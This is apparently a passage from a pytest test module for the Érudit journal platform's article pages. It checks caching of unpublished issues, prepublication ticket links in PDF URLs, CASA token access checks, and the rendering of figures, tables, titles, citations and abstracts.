# Test that the ticket is in the breadcrumbs
bc_hrefs = [e.get('href') for e in tree.findall('.//nav[@id="breadcrumbs"]//a')]
pa_hrefs = [e.get('href') for e in tree.findall('.//div[@class="pagination-arrows"]/a')]
# This is easier to debug than a generator
for href in bc_hrefs + pa_hrefs:
assert ('ticket' in href) == ticket_expected
def test_dont_cache_html_of_articles_of_unpublished_issues(self):
issue = IssueFactory.create(is_published=False)
article = ArticleFactory.create(issue=issue, title='thiswillendupinhtml')
url = '{}?ticket={}'.format(article_detail_url(article), issue.prepublication_ticket)
response = Client().get(url)
assert response.status_code == 200
assert b'thiswillendupinhtml' in response.content
with repository.api.open_article(article.pid) as wrapper:
wrapper.set_title('thiswillreplaceoldinhtml')
response = Client().get(url)
assert response.status_code == 200
assert b'thiswillendupinhtml' not in response.content
assert b'thiswillreplaceoldinhtml' in response.content
def test_dont_cache_fedora_objects_of_articles_of_unpublished_issues(self):
with unittest.mock.patch('erudit.fedora.modelmixins.cache') as cache_mock:
cache_mock.get.return_value = None
issue = IssueFactory.create(is_published=False)
article = ArticleFactory.create(issue=issue)
url = '{}?ticket={}'.format(article_detail_url(article), issue.prepublication_ticket)
response = Client().get(url)
assert response.status_code == 200
# Assert that the cache has not be called.
assert cache_mock.get.call_count == 0
def test_allow_ephemeral_articles(self):
# When receiving a request for an article that doesn't exist in the DB, try querying fedora
# for the requested PID before declaring a failure.
issue = IssueFactory.create()
article_localidentifier = 'foo'
repository.api.register_article(
'{}.{}'.format(issue.get_full_identifier(), article_localidentifier)
)
url = reverse('public:journal:article_detail', kwargs={
'journal_code': issue.journal.code, 'issue_slug': issue.volume_slug,
'issue_localid': issue.localidentifier, 'localid': article_localidentifier})
response = Client().get(url)
assert response.status_code == 200
@unittest.mock.patch('pikepdf.open')
@unittest.mock.patch('eulfedora.models.FileDatastreamObject._get_content')
@pytest.mark.parametrize('content_access_granted,has_abstracts,should_fetch_pdf', (
(True, True, False),
(True, False, False),
(False, True, False),
(False, False, True)
))
def test_do_not_fetch_pdfs_if_not_necessary(
self, mock_pikepdf, mock_content, content_access_granted, has_abstracts, should_fetch_pdf
):
""" Test that the PDF is only fetched on ArticleDetailView when the the user is not subscribed
and the article has no abstract
"""
article = ArticleFactory(with_pdf=True)
client = Client()
if has_abstracts:
with repository.api.open_article(article.pid) as wrapper:
wrapper.set_abstracts([{'lang': 'fr', 'content': 'Résumé français'}])
if content_access_granted:
subscription = JournalAccessSubscriptionFactory(
pk=1,
user__password='password',
post__valid=True,
post__journals=[article.issue.journal],
organisation=None, # TODO implement IndividualJournalAccessSubscriptionFactory
)
client.login(username=subscription.user.username, password="password")
url = article_detail_url(article)
response = client.get(url)
if should_fetch_pdf:
assert mock_content.call_count == 1
else:
assert mock_content.call_count == 0
assert response.status_code == 200
def test_querystring_doesnt_mess_media_urls(self):
journal = JournalFactory(open_access=True) # so we see the whole article
issue = IssueFactory(journal=journal)
article = ArticleFactory(issue=issue, from_fixture='1003446ar') # this article has media
url = '{}?foo=bar'.format(article_detail_url(article))
response = Client().get(url)
# we have some media urls
assert b'media/' in response.content
# We don't have any messed up media urls, that is, an URL with our querystring in the
# middle
assert b'barmedia/' not in response.content
@unittest.mock.patch('erudit.fedora.cache.cache')
@unittest.mock.patch('erudit.fedora.cache.get_datastream_file_cache')
@unittest.mock.patch('erudit.fedora.cache.get_cached_datastream_content')
@pytest.mark.parametrize('is_published, expected_count', [
# When an issue is not published, we should not get any cache.get() calls when displaying
# an article's PDF.
(False, 0),
# When an issue is published, we should get one cache.get() calls when displaying an
# article's PDF.
(True, 1),
])
def test_pdf_datastream_caching(self, mock_cache, mock_get_datastream_file_cache,
mock_get_cached_datastream_content, is_published,
expected_count):
mock_cache.get.return_value = None
mock_get_datastream_file_cache.return_value = mock_cache
mock_get_cached_datastream_content.return_value = None
article = ArticleFactory(
issue__is_published=is_published,
issue__journal__open_access=True,
)
url = reverse('public:journal:article_raw_pdf', kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
mock_cache.get.reset_mock()
response = Client().get(url, {
'ticket': article.issue.prepublication_ticket,
})
assert mock_cache.get.call_count == expected_count
@unittest.mock.patch('erudit.fedora.modelmixins.cache')
@pytest.mark.parametrize('is_published, expected_count', [
# When an issue is not published, we should not get any cache.get() calls when displaying
# an article's XML.
(False, 0),
# When an issue is published, we should get one cache.get() calls when displaying an
# article's XML.
(True, 1),
])
def test_xml_datastream_caching(self, mock_cache, is_published, expected_count):
mock_cache.get.return_value = None
article = ArticleFactory(
issue__is_published=is_published,
issue__journal__open_access=True,
)
url = reverse('public:journal:article_raw_xml', kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
mock_cache.get.reset_mock()
response = Client().get(url, {
'ticket': article.issue.prepublication_ticket,
})
assert mock_cache.get.call_count == expected_count
def test_that_article_titles_are_truncated_in_breadcrumb(self):
article = ArticleFactory(
from_fixture='1056823ar',
localidentifier='article',
issue__localidentifier='issue',
issue__year='2000',
issue__journal__code='journal',
)
url = article_detail_url(article)
response = Client().get(url)
html = response.content.decode()
assert '<a href="/fr/revues/journal/2000-issue/article/">Jean-Guy Desjardins, Traité de ' \
'l’évaluation foncière, Montréal, Wilson & Lafleur …</a>' in html
def test_keywords_html_tags(self):
article = ArticleFactory(from_fixture='1055883ar')
url = article_detail_url(article)
response = Client().get(url)
html = response.content.decode()
# Check that HTML tags are displayed in the body.
assert '<ul>\n<li class="keyword">Charles Baudelaire, </li>\n<li class="keyword">\n' \
'<em>Fleurs du Mal</em>, </li>\n<li class="keyword">Seine, </li>\n' \
'<li class="keyword">mythe et réalité de Paris, </li>\n' \
'<li class="keyword">poétique du miroir</li>\n</ul>' in html
# Check that HTML tags are not displayed in the head.
assert '<meta name="citation_keywords" lang="fr" content="Charles Baudelaire, Fleurs du ' \
'Mal, Seine, mythe et réalité de Paris, poétique du miroir" />' in html
def test_article_pdf_links(self):
article = ArticleFactory(
with_pdf=True,
from_fixture='602354ar',
localidentifier='602354ar',
issue__year='2000',
issue__localidentifier='issue',
issue__is_published=False,
issue__journal__code='journal',
issue__journal__open_access=True,
)
url = article_detail_url(article)
response = Client().get(url, {
'ticket': article.issue.prepublication_ticket if not article.issue.is_published else '',
})
html = response.content.decode()
# Check that the PDF download button URL has the prepublication ticket if the issue is not
# published.
assert '<a class="tool-btn tool-download" ' \
'data-href="/fr/revues/journal/2000-issue/602354ar.pdf?' \
'ticket=0aae4c8f3cc35693d0cbbe631f2e8b52"><span class="toolbox-pdf">PDF</span>' \
'<span class="tools-label">Télécharger</span></a>' in html
# Check that the PDF menu link URL has the prepublication ticket if the issue is not
# published.
assert '<a href="#pdf-viewer" id="pdf-viewer-menu-link">Texte intégral (PDF)</a>' \
'<a href="/fr/revues/journal/2000-issue/602354ar.pdf?' \
'ticket=0aae4c8f3cc35693d0cbbe631f2e8b52" id="pdf-download-menu-link" ' \
'target="_blank">Texte intégral (PDF)</a>' in html
# Check that the embeded PDF URL has the prepublication ticket if the issue is not
# published.
assert '<object id="pdf-viewer" data="/fr/revues/journal/2000-issue/602354ar.pdf?' \
'embed&ticket=0aae4c8f3cc35693d0cbbe631f2e8b52" type="application/pdf" ' \
'style="width: 100%; height: 700px;"></object>' in html
# Check that the PDF download link URL has the prepublication ticket if the issue is not
# published.
assert '<a href="/fr/revues/journal/2000-issue/602354ar.pdf?' \
'ticket=0aae4c8f3cc35693d0cbbe631f2e8b52" class="btn btn-secondary" ' \
'target="_blank">Télécharger</a>' in html
article.issue.is_published = True
article.issue.save()
response = Client().get(url)
html = response.content.decode()
# Check that the PDF download button URL does not have the prepublication ticket if the
# issue is published.
assert '<a class="tool-btn tool-download" data-href="/fr/revues/journal/2000-issue/' \
'602354ar.pdf"><span class="toolbox-pdf">PDF</span><span ' \
'class="tools-label">Télécharger</span></a>' in html
# Check that the PDF menu link URL does not have the prepublication ticket if the issue
# is published.
assert '<a href="#pdf-viewer" id="pdf-viewer-menu-link">Texte intégral (PDF)</a>' \
'<a href="/fr/revues/journal/2000-issue/602354ar.pdf" id="pdf-download-menu-link" ' \
'target="_blank">Texte intégral (PDF)</a>' in html
# Check that the embeded PDF URL does not have the prepublication ticket if the issue is
# published.
assert '<object id="pdf-viewer" data="/fr/revues/journal/2000-issue/602354ar.pdf?' \
'embed" type="application/pdf" style="width: 100%; height: 700px;"></object>' in html
# Check that the PDF download link URL does not have the prepublication ticket if the issue
# is published.
assert '<a href="/fr/revues/journal/2000-issue/602354ar.pdf" class="btn btn-secondary" ' \
'target="_blank">Télécharger</a>' in html
@pytest.mark.parametrize('kwargs, nonce_count, authorized', (
# Valid token
({}, 1, True),
# Badly formed token
({'token_separator': '!'}, 1, False),
# Invalid nonce
({'invalid_nonce': True}, 1, False),
# Invalid message
({'invalid_message': True}, 1, False),
# Invalid signature
({'invalid_signature': True}, 1, False),
# Nonce seen more than 3 times
({}, 4, False),
# Badly formatted payload
({'payload_separator': '!'}, 1, False),
# Expired token
({'time_delta': 3600000001}, 1, False),
# Wrong IP
({'ip_subnet': '8.8.8.0/24'}, 1, False),
# Invalid subscription
({'subscription_id': 2}, 1, False),
))
@pytest.mark.parametrize('url_name', (
('public:journal:article_detail'),
('public:journal:article_raw_pdf'),
))
@unittest.mock.patch('core.subscription.middleware.SubscriptionMiddleware._nonce_count')
@override_settings(GOOGLE_CASA_KEY='74796E8FF6363EFF91A9308D1D05335E')
def test_article_detail_with_google_casa_token(self, mock_nonce_count, url_name, kwargs,
nonce_count, authorized):
mock_nonce_count.return_value = nonce_count
article = ArticleFactory()
JournalAccessSubscriptionFactory(
pk=1,
post__valid=True,
post__journals=[article.issue.journal],
)
url = reverse(url_name, kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
response = Client().get(url, {
'casa_token': generate_casa_token(**kwargs),
}, follow=True)
html = response.content.decode()
if authorized:
assert 'Seuls les 600 premiers mots du texte seront affichés.' not in html
else:
assert 'Seuls les 600 premiers mots du texte seront affichés.' in html
@pytest.mark.parametrize('url_name, fixture, display_biblio, display_pdf_first_page', (
# Complete treatment articles should always display a bibliography
('public:journal:article_biblio', '009256ar', 1, 0),
('public:journal:article_summary', '009256ar', 1, 0),
('public:journal:article_detail', '009256ar', 1, 0),
# Retro minimal treatment articles should only display a bibliography in article_biblio view
('public:journal:article_biblio', '1058447ar', 1, 0),
('public:journal:article_summary', '1058447ar', 0, 1),
('public:journal:article_detail', '1058447ar', 0, 1),
# Bibliography should not be displayed on TOC page.
('public:journal:article_toc', '009256ar', 0, 0),
('public:journal:article_toc', '1058447ar', 0, 0),
))
def test_biblio_references_display(self, url_name, fixture, display_biblio,
display_pdf_first_page):
article = ArticleFactory(
from_fixture=fixture,
with_pdf=True,
)
url = reverse(url_name, kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
html = Client().get(url).content.decode()
assert html.count('<section id="grbiblio" class="article-section grbiblio" '
'role="complementary">') == display_biblio
# Minimal treatment articles should not display PDF first page when displaying references.
assert html.count('<object id="pdf-viewer"') == display_pdf_first_page
@pytest.mark.parametrize('open_access', (True, False))
@pytest.mark.parametrize('url_name', (
('public:journal:article_biblio'),
('public:journal:article_summary'),
('public:journal:article_detail'),
('public:journal:article_toc'),
))
def test_display_citation_fulltext_world_readable_metatag_only_for_open_access_articles(
self, url_name, open_access
):
article = ArticleFactory(issue__journal__open_access=open_access)
url = reverse(url_name, kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
html = Client().get(url).content.decode()
# The citation_fulltext_world_readable metatag should only be displayed for open access
# articles. Otherwise, some Google Scholar services won't work (eg. CASA).
if open_access:
assert '<meta name="citation_fulltext_world_readable" content="" />' in html
else:
assert '<meta name="citation_fulltext_world_readable" content="" />' not in html
@pytest.mark.parametrize('publication_allowed', (True, False))
@pytest.mark.parametrize('url_name', (
('public:journal:article_biblio'),
('public:journal:article_summary'),
('public:journal:article_detail'),
('public:journal:article_toc'),
))
def test_publication_allowed_text_display(self, url_name, publication_allowed):
article = ArticleFactory(
publication_allowed=publication_allowed,
issue__journal__open_access=True,
)
url = reverse(url_name, kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
if publication_allowed:
assert 'Plan de l’article' in dom.decode()
assert 'Boîte à outils' in dom.decode()
if url_name != 'public:journal:article_detail':
assert 'Lire le texte intégral' in dom.decode()
if url_name not in ['public:journal:article_biblio', 'public:journal:article_toc']:
assert 'In October 1800 the poet, travel-writer and polemicist Robert Southey ' \
'was in Portugal.' in dom.decode()
else:
assert 'Plan de l’article' not in dom.decode()
assert 'Boîte à outils' not in dom.decode()
assert 'Lire le texte intégral' not in dom.decode()
assert 'In October 1800 the poet, travel-writer and polemicist Robert Southey was in ' \
'Portugal.' not in dom.decode()
def test_article_detail_marquage_in_toc_nav(self):
issue = IssueFactory(
journal__code='journal',
localidentifier='issue',
year='2000',
)
ArticleFactory(
from_fixture='1054008ar',
localidentifier='prev_article',
issue=issue,
)
article = ArticleFactory(
issue=issue,
)
ArticleFactory(
from_fixture='1054008ar',
localidentifier='next_article',
issue=issue,
)
url = article_detail_url(article)
response = Client().get(url)
html = response.content.decode()
# Check that TOC navigation titles include converted marquage.
assert '<a href="/fr/revues/journal/2000-issue/prev_article/" class="toc-nav__prev" ' \
'title="Article précédent"><span class="toc-nav__arrow">' \
'<span class="arrow arrow-bar is-left"></span></span>' \
'<h4 class="toc-nav__title">\n L’action et le verbe dans ' \
'<em>Feuillets d’Hypnos</em>\n</h4></a>' in html
assert '<a href="/fr/revues/journal/2000-issue/next_article/" class="toc-nav__next" ' \
'title="Article suivant"><span class="toc-nav__arrow">' \
'<span class="arrow arrow-bar is-right"></span></span><h4 ' \
'class="toc-nav__title">\n L’action et le verbe dans ' \
'<em>Feuillets d’Hypnos</em>\n</h4></a>' in html
def test_surtitre_not_split_in_multiple_spans(self):
article = ArticleFactory(
from_fixture='1056389ar',
)
url = article_detail_url(article)
response = Client().get(url)
html = response.content.decode()
assert '<span class="surtitre">Cahier commémoratif : ' \
'25<sup>e</sup> anniversaire</span>' in html
def test_title_and_paral_title_are_displayed(self):
article = ArticleFactory(
from_fixture='1058368ar',
)
url = article_detail_url(article)
response = Client().get(url)
html = response.content.decode()
assert '<span class="titre">Les Parcs Nationaux de Roumanie : considérations sur les ' \
'habitats Natura 2000 et sur les réserves IUCN</span>' in html
assert '<span class="titreparal">The National Parks of Romania: considerations on Natura ' \
'2000 habitats and IUCN reserves</span>' in html
def test_article_detail_view_with_untitled_article(self):
article = ArticleFactory(
from_fixture='1042058ar',
localidentifier='article',
issue__year='2000',
issue__localidentifier='issue',
issue__journal__code='journal',
issue__journal__name='Revue',
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
# Check that "[Article sans titre]" is displayed in the header title.
assert '<title>[Article sans titre] – Inter – Érudit</title>' in html
# Check that "[Article sans titre]" is displayed in the body title.
assert '<h1 class="doc-head__title"><span class="titre">[Article sans titre]</span></h1>' in html
# Check that "[Article sans titre]" is displayed in the breadcrumbs.
assert '<li>\n <a href="/fr/revues/journal/2000-issue/article/">[Article sans titre]</a>' \
'\n</li>' in html
def test_article_authors_with_suffixes(self):
article = ArticleFactory(
from_fixture='1058611ar',
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
# Check that authors' suffixes are not displayed on the the author list under the article
# title.
assert '<li class="auteur doc-head__author">\n<span class="nompers">André\n ' \
'Ngamini-Ngui</span> et </li>' in html
# Check that authors' suffixes are displayed on the 'more information' section.
assert '<li class="auteur-affiliation"><p><strong>André\n Ngamini-Ngui, †</strong>' \
'</p></li>' in html
def test_figure_groups_source_display(self):
article = ArticleFactory(
from_fixture='1058470ar',
localidentifier='article',
issue__year='2000',
issue__localidentifier='issue',
issue__journal__code='journal',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
grfigure = dom.find('div', {'class': 'grfigure', 'id': 'gf1'})
# Check that the source is displayed under both figures 1 & 2 which are in the same figure group.
fi1 = grfigure.find('figure', {'id': 'fi1'}).decode()
fi2 = grfigure.find('figure', {'id': 'fi2'}).decode()
assert fi1 == '<figure class="figure" id="fi1"><figcaption></figcaption><div ' \
'class="figure-wrapper">\n<div class="figure-object"><a class="lightbox ' \
'objetmedia" href="/fr/revues/journal/2000-issue/article/media/" title="">' \
'<img alt="" class="lazyload img-responsive" data-aspectratio="/" ' \
'data-srcset="/fr/revues/journal/2000-issue/article/media/ w" height="" ' \
'src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAA' \
'AC0lEQVR42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII=" width=""/></a></div>\n' \
'<div class="figure-legende-notes-source"><cite class="source">Avec ' \
'l’aimable autorisation de l’artiste et kamel mennour, Paris/London. © ' \
'<em>ADAGP Mohamed Bourouissa</em></cite></div>\n</div></figure>'
assert fi2 == '<figure class="figure" id="fi2"><figcaption></figcaption><div ' \
'class="figure-wrapper">\n<div class="figure-object"><a class="lightbox ' \
'objetmedia" href="/fr/revues/journal/2000-issue/article/media/" title="">' \
'<img alt="" class="lazyload img-responsive" data-aspectratio="/" ' \
'data-srcset="/fr/revues/journal/2000-issue/article/media/ w" height="" ' \
'src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAA' \
'AC0lEQVR42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII=" width=""/></a></div>\n' \
'<div class="figure-legende-notes-source"><cite class="source">Avec ' \
'l’aimable autorisation de l’artiste et kamel mennour, Paris/London. © ' \
'<em>ADAGP Mohamed Bourouissa</em></cite></div>\n</div></figure>'
# Check that the figure list link is displayed.
voirliste = grfigure.find('p', {'class': 'voirliste'})
assert voirliste.decode() == '<p class="voirliste"><a href="#ligf1">-> Voir la liste ' \
'des figures</a></p>'
@unittest.mock.patch.object(ArticleDigitalObject, 'infoimg')
def test_figure_with_float_dimensions(self, mock_infoimg):
article = ArticleFactory(
from_fixture='1068859ar',
localidentifier='article',
issue__year='2000',
issue__localidentifier='issue',
issue__journal__code='journal',
issue__journal__open_access=True,
)
mock_infoimg.content = unittest.mock.MagicMock()
mock_infoimg.content.serialize = unittest.mock.MagicMock(
return_value="""
<infoDoc>
<im id="img-05-01.png">
<imPlGr>
<nomImg>2135184.png</nomImg>
<dimx>863.0</dimx>
<dimy>504.0</dimy>
<taille>246ko</taille>
</imPlGr>
</im>
</infoDoc>
"""
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
fi1 = dom.find('figure', {'id': 'fi1'}).find('img').decode()
assert '<img alt="Modèle intégrateur : les mécanismes du façonnement des normes par la ' \
'sphère médiatique" class="lazyload img-responsive" data-aspectratio="863/504" ' \
'data-srcset="/fr/revues/journal/2000-issue/article/media/2135184.png 863w" ' \
'height="504" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1H' \
'AwCAAAAC0lEQVR42mNkYAAAAAYAAjCB0C8AAAAASUVORK5CYII=" width="863"/>' == fi1
def test_table_groups_display(self):
article = ArticleFactory(
from_fixture='1061713ar',
localidentifier='article',
issue__year='2000',
issue__localidentifier='issue',
issue__journal__code='journal',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
grtableau = dom.find_all('div', {'class': 'grtableau'})[0]
figures = grtableau.find_all('figure')
# Check that the table group is displayed.
assert grtableau.attrs.get('id') == 'gt1'
# Check that the tables are displayed inside the table group.
assert figures[0].attrs.get('id') == 'ta2'
assert figures[1].attrs.get('id') == 'ta3'
assert figures[2].attrs.get('id') == 'ta4'
# Check that the table images are displayed inside the tables.
assert len(figures[0].find_all('img', {'class': 'img-responsive'})) == 1
assert len(figures[1].find_all('img', {'class': 'img-responsive'})) == 1
assert len(figures[2].find_all('img', {'class': 'img-responsive'})) == 1
# Check that the table legends are displayed inside the tables.
assert len(figures[0].find_all('p', {'class': 'alinea'})) == 1
assert len(figures[1].find_all('p', {'class': 'alinea'})) == 2
assert len(figures[2].find_all('p', {'class': 'alinea'})) == 4
def test_table_groups_display_with_table_no(self):
article = ArticleFactory(
from_fixture='1060065ar',
localidentifier='article',
issue__year='2000',
issue__localidentifier='issue',
issue__journal__code='journal',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
grtableau = dom.find_all('div', {'class': 'grtableau'})[0]
figures = grtableau.find_all('figure')
# Check that the table group is displayed.
assert grtableau.attrs.get('id') == 'gt1'
# Check that the tables are displayed inside the table group.
assert figures[0].attrs.get('id') == 'ta2'
assert figures[1].attrs.get('id') == 'ta3'
# Check that the table numbers are displayed.
assert figures[0].find_all('p', {'class': 'no'})[0].text == '2A'
assert figures[1].find_all('p', {'class': 'no'})[0].text == '2B'
def test_figure_back_arrow_is_displayed_when_theres_no_number_or_title(self):
article = ArticleFactory(
from_fixture='1031003ar',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
# Check that the arrow to go back to the figure is present event if there's no figure
# number or caption.
assert '<figure class="tableau" id="lita7"><figcaption><p class="allertexte">' \
'<a href="#ta7"><span class="arrow arrow-bar is-top"></span></a></p>' \
'</figcaption>' in html
def test_figure_groups_numbers_display_in_figure_list(self):
article = ArticleFactory(
from_fixture='1058470ar',
localidentifier='article',
issue__year='2000',
issue__localidentifier='issue',
issue__journal__code='journal',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
# Check that the figure numbers are displayed in the figure list for figure groups.
assert '<div class="grfigure" id="ligf1">\n<div class="grfigure-caption">\n' \
'<p class="allertexte"><a href="#gf1"><span class="arrow arrow-bar is-top"></span>' \
'</a></p>\n<p class="no">Figures 1 - 2</p>' in html
def test_figcaption_display_for_figure_groups_and_figures(self):
article = ArticleFactory(
from_fixture='1060169ar',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
# Check that figure group caption and the figure captions are displayed.
assert '<div class="grfigure-caption">\n<p class="allertexte"><a href="#gf1">' \
'<span class="arrow arrow-bar is-top"></span></a></p>\n' \
'<p class="no">Figure 1</p>\n<div class="legende"><p class="legende">' \
'<strong class="titre">RMF frequencies in German data</strong>' \
'</p></div>\n</div>' in html
assert '<figcaption><p class="legende"><strong class="titre">German non-mediated</strong>' \
'</p></figcaption>' in html
assert '<figcaption><p class="legende"><strong class="titre">German interpreted' \
'</strong></p></figcaption>' in html
def test_article_multilingual_titles(self):
article = ArticleFactory(
from_fixture='1059303ar',
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
# Check that paral titles are displayed in the article header.
assert '<span class="titreparal">Détection d’ADN d’<em>Ophiostoma ulmi</em> ' \
'introgressé naturellement dans les régions entourant les loci contrôlant ' \
'la pathogénie et le type sexuel chez <em>O. novo-ulmi</em></span>' in html
# Check that paral titles are not displayed in summary section.
assert '<h4><span class="title">Détection d’ADN d’<em>Ophiostoma ulmi</em> introgressé ' \
'naturellement dans les régions entourant les loci contrôlant la pathogénie et le ' \
'type sexuel chez <em>O. novo-ulmi</em></span></h4>' not in html
def test_authors_more_information_for_author_with_suffix_and_no_affiliation(self):
article = ArticleFactory(
from_fixture='1059571ar',
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
# Check that more information akkordion is displayed for author with suffix and
# no affiliation.
assert '<ul class="akkordion-content unstyled"><li class="auteur-affiliation"><p>' \
'<strong>Guy\n Sylvestre, o.c.</strong></p></li></ul>' in html
def test_journal_multilingual_titles_in_citations(self):
issue = IssueFactory(year="2019")
repository.api.set_publication_xml(
issue.get_full_identifier(),
open('tests/fixtures/issue/ri04376.xml', 'rb').read(),
)
article = ArticleFactory(
localidentifier='article',
issue=issue,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
# Check that the journal name is displayed in French and English (Relations industrielles
# / Industrial Relations).
assert '<dd id="id_cite_mla_article" class="cite-mla">\n Pratt, Lynda. ' \
'« Robert Southey, Writing and Romanticism. » <em>Relations ' \
'industrielles / Industrial Relations</em>, volume 73, numéro 4, automne 2018. ' \
'https://doi.org/10.7202/009255ar\n </dd>' in html
assert '<dd id="id_cite_apa_article" class="cite-apa">\n ' \
'Pratt, L. (2019). Robert Southey, Writing and Romanticism. ' \
'<em>Relations industrielles / Industrial Relations</em>. ' \
'https://doi.org/10.7202/009255ar\n </dd>' in html
assert '<dd id="id_cite_chicago_article" class="cite-chicago">\n ' \
'Pratt, Lynda « Robert Southey, Writing and Romanticism ». ' \
'<em>Relations industrielles / Industrial Relations</em> (2019). ' \
'https://doi.org/10.7202/009255ar\n </dd>' in html
@pytest.mark.parametrize('fixture, url_name, expected_result', (
# Multilingual journals should have all titles in citations.
('ri04376', 'public:journal:article_citation_enw',
'%J Relations industrielles / Industrial Relations'),
('ri04376', 'public:journal:article_citation_ris',
'JO - Relations industrielles / Industrial Relations'),
('ri04376', 'public:journal:article_citation_bib',
'journal="Relations industrielles / Industrial Relations",'),
# Sub-titles should not be in citations.
('im03868', 'public:journal:article_citation_enw', '%J Intermédialités / Intermediality'),
('im03868', 'public:journal:article_citation_ris',
'JO - Intermédialités / Intermediality'),
('im03868', 'public:journal:article_citation_bib',
'journal="Intermédialités / Intermediality'),
))
def test_journal_multilingual_titles_in_article_citation_views(self, fixture, url_name,
expected_result):
issue = IssueFactory()
repository.api.set_publication_xml(
issue.get_full_identifier(),
open('tests/fixtures/issue/{}.xml'.format(fixture), 'rb').read(),
)
article = ArticleFactory(
issue=issue,
)
url = reverse(url_name, kwargs={
'journal_code': article.issue.journal.code,
'issue_slug': article.issue.volume_slug,
'issue_localid': article.issue.localidentifier,
'localid': article.localidentifier,
})
citation = Client().get(url).content.decode()
# Check that the journal name is displayed in French and English (Relations industrielles /
# Industrial Relations).
assert expected_result in citation
def test_doi_with_extra_space(self):
article = ArticleFactory(
from_fixture='1009368ar',
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
# Check that extra space around DOIs is stripped.
assert '<meta name="citation_doi" content="https://doi.org/10.7202/1009368ar" />' in html
assert '<a href="https://doi.org/10.7202/1009368ar" class="clipboard-data">' in html
def test_unicode_combining_characters(self):
article = ArticleFactory(
from_fixture='1059577ar',
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
# Pre-combined character is present (ă = ă)
assert '<em>Studii de lingvistică</em>' in html
# Combining character is not present (ă = a + ˘)
assert '<em>Studii de lingvistică</em>' not in html
def test_acknowledgements_and_footnotes_sections_order(self):
article = ArticleFactory(
from_fixture='1060048ar',
issue__journal__open_access=True,
)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
partiesann = dom.find_all('section', {'class': 'partiesann'})[0]
sections = partiesann.find_all('section')
# Check that acknowledgements are displayed before footnotes.
assert sections[0].attrs['id'] == 'merci'
assert sections[1].attrs['id'] == 'grnote'
def test_abstracts_and_keywords(self):
article = ArticleFactory()
with repository.api.open_article(article.pid) as wrapper:
wrapper.set_abstracts([{'lang': 'fr', 'content': 'Résumé français'}])
wrapper.set_abstracts([{'lang': 'en', 'content': 'English abstract'}])
wrapper.add_keywords('es', ['Palabra clave en español'])
wrapper.add_keywords('fr', ['Mot-clé français'])
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
grresume = dom.find_all('section', {'class': 'grresume'})[0]
resumes = grresume.find_all('section', {'class': 'resume'})
keywords = grresume.find_all('div', {'class': 'keywords'})
# Make sure the main abstract (English) appears first, even though it's in second position
# in the XML.
assert resumes[0].decode() == '<section class="resume" id="resume-en"><h3>Abstract</h3>\n' \
'<p class="alinea"><em>English abstract</em></p></section>'
# Make sure the French keywords appear in the French abstract section.
assert resumes[1].decode() == '<section class="resume" id="resume-fr"><h3>Résumé</h3>\n' \
'<p class="alinea"><em>Résumé français</em></p>\n' \
'<div class="keywords">\n<p><strong>Mots-clés :</strong>' \
'</p>\n<ul><li class="keyword">Mot-clé français</li></ul>' \
'\n</div></section>'
# Make sure the French keywords appear first since there is no English keywords and no
# Spanish abstract.
assert keywords[0].decode() == '<div class="keywords">\n<p><strong>Mots-clés :</strong>' \
'</p>\n<ul><li class="keyword">Mot-clé français</li>' \
'</ul>\n</div>'
# Make sure the Spanish keywords are displayed even though there is no Spanish abstract.
assert keywords[1].decode() == '<div class="keywords">\n<p><strong>Palabras clave:' \
'</strong></p>\n<ul><li class="keyword">Palabra clave en ' \
'español</li></ul>\n</div>'
@pytest.mark.parametrize('article_type, expected_string', (
('compterendu', 'Un compte rendu de la revue'),
('article', 'Un article de la revue'),
))
def test_review_article_explanatory_note(self, article_type, expected_string):
article = ArticleFactory(type=article_type)
url = article_detail_url(article)
html = Client().get(url).content.decode()
dom = BeautifulSoup(html, 'html.parser')
div = dom.find_all('div', {'class': 'doc-head__metadata'})[1]
note = 'Ce document est le compte-rendu d\'une autre oeuvre tel qu\'un livre ou un ' \
'film. L\'oeuvre originale discutée ici n\'est pas disponible sur cette plateforme.'
assert expected_string in div.decode()
